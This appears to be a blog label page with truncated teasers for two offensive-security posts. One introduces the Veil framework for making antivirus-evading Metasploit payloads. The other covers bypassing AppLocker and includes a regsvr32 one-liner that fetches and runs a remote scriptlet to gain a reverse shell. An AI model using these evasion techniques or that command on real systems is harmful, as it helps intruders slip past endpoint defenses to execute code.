Posts

Showing posts with the label Bypassing

HOW TO BYPASS ANTIVIRUS DETECTION USING VEIL IN KALI LINUX

HOW TO BYPASS ANTIVIRUS DETECTION USING VEIL IN KALI LINUX *********************************************************************************** Veil is a awesome tool developed by Chris Truncer @ChrisTruncer, Mike Wright @TheMightyShiv and The Grayhound @the_grayhound specifically designed for Kali Linux which has the goal of: Bypass common AV solutions used. Get the payloads from Metasploit framework, and get the new ones in the future Metasploit releases. Try to create each payload as random as possible. Some days ago Veil v2.0.4 was Released. I'm want to talk about it and give some examples about how to bypass severals anti-virus. The main changes in this version is: x64 compatibility – They have updated their setup script in order to make Veil compatible with both x86 and x64 versions. Update Feature – Now Veil has an update function. Now we can update Veil either the command line or menu. There are tutorials available at http://www.veil-evasion.com The framewor...

Bypass Application Whitelisting Script Protections - Regsvr32.exe & COM Scriptlets (.sct files)

Bypass Application Whitelisting Script Protections - Regsvr32.exe & COM Scriptlets (. sct files) =============================================== THIS VULNERABILTY WAS DISCOVERED BY MY FRIEND PLX-2M    (In this article all the "I" refers to he himself) So, I have been working this out the last few days. I was trying solve a particular problem. I needed a reverse shell on workstation locked down by AppLocker executable and script rules enforced. tl;dr "regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll" I have been researching fileless persistence mechanisms.  And it led me to a dark place.  I would wish on no mortal.  COM+. I posted earlier about .sct files. This link describes what they are. In short they are XML documents, that allow you to register COM objects that are backed not by a .dll but scripts. Inside COM+ However, I wasn't really happy with what I had found since it required Admin rights in order to execute.  I could reg...